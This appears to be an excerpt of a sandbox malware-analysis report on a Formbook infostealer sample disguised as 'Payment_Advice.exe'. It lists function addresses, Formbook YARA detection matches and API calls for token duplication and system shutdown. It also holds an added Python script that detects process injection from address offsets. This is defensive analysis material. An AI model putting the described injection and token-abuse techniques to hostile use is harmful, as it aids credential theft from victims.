          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037AB2C0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037952A0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0377F172
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037C516C
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0379B1B0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0385B16B
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0383F0CC
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384F0E0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_038470E9
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037970C0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384F7B0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_038416CC
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037D5630
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0382D5B0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_038595C3
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03847571
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03781460
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384F43F
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03805BF0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037CDBF9
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384FB76
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037AFB80
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03831AA3
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0382DAAC
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0383DAC6
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03847A46
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384FA49
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037D5AA0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03803A6C
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03799950
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037AB950
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03825910
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037FD800
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037938E0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384FFB1
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384FF09
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03753FD5
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03753FD2
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03791F92
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03799EB0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03793D40
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_037AFDC0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03841D5A
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03847D73
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0384FCF2
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03809C32
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B6E5BB
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B6D563
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B6DB3B
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B6E81C
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B59E50
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B59E4F
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B52FB0
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B6DF8B
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B52D90
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B52D88
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02B6DDCE
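The function listing above carries more information than a flat list suggests. Every address the sandbox found in the 0x016Axxxx to 0x017Bxxxx range of RegSvcs.exe (process 14) reappears in cmd.exe (process 16) exactly 0x020B0000 higher (14_2_016D0100 and 16_2_03780100, 14_2_017A03E6 and 16_2_038503E6, 14_2_016A3FD5 and 16_2_03753FD5, and so on for the whole range), the two functions 14_2_00409E50 and 14_2_00402FB0 from the unpacked image at 0x400000 reappear at 16_2_02B59E50 and 16_2_02B52FB0 (offset 0x02750000), and explorer.exe (process 15) holds two copies of the same eight functions 0x00506000 apart (15_2_10196036 and 15_2_1069C036, 15_2_1018D082 and 15_2_10693082). A constant offset shared by dozens of function starts means one code image was mapped at a second base, in another process or twice in the same one, which is the footprint of the process-injection behaviour this report flags. The Python script below is an added example, not part of the Joe Sandbox report; it parses "Code function" lines (in both the spaced form used here and the run-together form the HTML export produces) and recovers such offsets by counting, for each pair of processes, how many function addresses line up under the same delta. Its input is a constructed subset of the lines above with paths shortened to the basename, plus one line kept exactly as exported.

```python
import re
from collections import Counter, defaultdict
from itertools import product

# Accepts "RegSvcs.exe Code function: 14_2_00409E50" and the run-together export form
# "cmd.exeCode function: 16_2_0384F7B016_2_0384F7B0" (the trailing duplicate is ignored).
FUNC_RE = re.compile(
    r"Source: (?P<image>\S+?)\s*Code function: (?P<proc>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]{8})"
)


def parse_functions(lines):
    """Group function start addresses by (process index, image basename)."""
    funcs = defaultdict(set)
    for line in lines:
        m = FUNC_RE.search(line)
        if m:
            image = m["image"].rsplit("\\", 1)[-1]
            funcs[(int(m["proc"]), image)].add(int(m["addr"], 16))
    return funcs


def shared_deltas(funcs, min_support=3):
    """For every pair of processes (a process paired with itself included) find constant
    offsets d such that at least min_support addresses of the first process reappear at
    address + d in the second.  High support means the same code image is mapped at two
    bases, i.e. it was copied between (or duplicated within) processes.
    Returns {(proc_a, proc_b): [(delta, support), ...]} with the best-supported delta first."""
    keys = sorted(funcs)
    found = {}
    for i, a in enumerate(keys):
        for b in keys[i:]:
            counts = Counter()
            for x, y in product(funcs[a], funcs[b]):
                d = y - x
                if a == b and d <= 0:      # same process: each unordered pair once, no self-pairs
                    continue
                counts[d] += 1
            hits = sorted(((d, n) for d, n in counts.items() if n >= min_support),
                          key=lambda t: (-t[1], t[0]))
            if hits:
                found[(a, b)] = hits
    return found


# Constructed sample: a subset of the "Code function" entries in this report (addresses copied
# from the listing above, paths shortened to the basename), plus one line as the export wrote it.
SAMPLE = [f"Source: {img} Code function: {proc}_2_{addr:08X}" for img, proc, addr in [
    ("RegSvcs.exe", 14, 0x00409E50), ("RegSvcs.exe", 14, 0x00402FB0), ("RegSvcs.exe", 14, 0x0041DF7D),
    ("RegSvcs.exe", 14, 0x016D0100), ("RegSvcs.exe", 14, 0x017A03E6), ("RegSvcs.exe", 14, 0x016EE3F0),
    ("RegSvcs.exe", 14, 0x017602C0), ("RegSvcs.exe", 14, 0x016A3FD5), ("RegSvcs.exe", 14, 0x0179F7B0),
    ("explorer.exe", 15, 0x10196036), ("explorer.exe", 15, 0x1018D082), ("explorer.exe", 15, 0x1019A5CD),
    ("explorer.exe", 15, 0x1069C036), ("explorer.exe", 15, 0x10693082), ("explorer.exe", 15, 0x106A05CD),
    ("cmd.exe", 16, 0x00A474B1), ("cmd.exe", 16, 0x00A4540A), ("cmd.exe", 16, 0x02B6E5BB),
    ("cmd.exe", 16, 0x02B59E50), ("cmd.exe", 16, 0x02B52FB0), ("cmd.exe", 16, 0x03753FD5),
    ("cmd.exe", 16, 0x03780100), ("cmd.exe", 16, 0x038503E6), ("cmd.exe", 16, 0x0379E3F0),
    ("cmd.exe", 16, 0x038102C0),
]] + [r"Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0384F7B016_2_0384F7B0"]


if __name__ == "__main__":
    for (a, b), hits in shared_deltas(parse_functions(SAMPLE), min_support=2).items():
        for d, n in hits:
            print(f"{a[0]:>2} {a[1]:<12} -> {b[0]:>2} {b[1]:<12} delta 0x{d:08X}  ({n} functions)")
```

On the full listing the RegSvcs/cmd delta of 0x020B0000 is supported by every one of the roughly one hundred 0x016A to 0x017B addresses, so a threshold of three is conservative; for a process compared with itself keep the threshold at three or higher, because two copies of the same code also produce matching function-to-function spacings that show up as deltas with a support of two.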
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp Code function: 6_2_001D1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
          Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
          Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
          Source: C:\Users\user\Desktop\Payment_Advice.exe Section loaded: dxgidebug.dll
          Source: Payment_Advice.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1581336819.000000000106B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1578728915.000000000106C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1578835292.00000000010C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1578787008.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1579705407.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1580860266.000000000109A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000003.1581247037.000000000103D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.3875577794.00000000106B5000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: ewdbwwfpdh.bmp PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmd.exe PID: 636, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001DF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01727E54 appears 111 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0174EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0175F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 016CB970 appears 280 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 01715130 appears 58 times
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: String function: 0051EB78 appears 39 times
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: String function: 0051F5F0 appears 31 times
Source: C:\Users\user\Desktop\Payment_Advice.exe | Code function: String function: 0051EC50 appears 56 times
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 037FEA12 appears 86 times
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 037C5130 appears 58 times
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 0380F290 appears 105 times
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 0377B970 appears 280 times
